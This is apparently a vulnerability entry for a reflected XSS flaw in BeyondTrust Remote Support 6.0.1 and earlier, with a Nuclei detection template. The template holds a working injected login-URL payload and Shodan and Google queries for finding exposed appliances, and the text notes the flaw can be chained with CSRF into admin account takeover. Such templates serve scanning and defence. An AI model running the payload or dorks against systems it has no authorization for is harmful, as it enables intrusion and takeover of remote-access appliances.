Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.
PoC代码[已公开]
id: beyond-trust-xss
info:
name: BeyondTrust Remote Support 6.0 - Cross-Site Scripting
author: r3Y3r53
severity: medium
description: |
Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.
reference:
- https://www.exploit-db.com/exploits/50632
classification:
cpe: cpe:2.3:a:beyondtrust:remote_support:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: beyondtrust
product: remote_support
shodan-query: html:"BeyondTrust"
google-query: intext:"BeyondTrust" "Redistribution Prohibited"
tags: beyondtrust,xss,intrusive,vuln
http:
- method: GET
path:
- "{{BaseURL}}/appliance/login?login[password]={{randstr}}%22%3E%3Csvg/onload=alert(document.domain)%3E&login[use_curr]=1&login[submit]=Change%20Password"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "text/html")'
- 'contains(body, "<svg/onload=alert(document.domain)>") && contains(body, "beyondtrust")'
condition: and
# digest: 490a00463044022026f2abd9b736fc49c20ab06c58478e0cbe540d2ad9e3d9facf720cca8b6e018702206b2c8e20b44fbca1daef071f182f7aef1e80c34daf6544a1829cbfe9dfc720e7:922c64590222798bb761d5b6d8e72950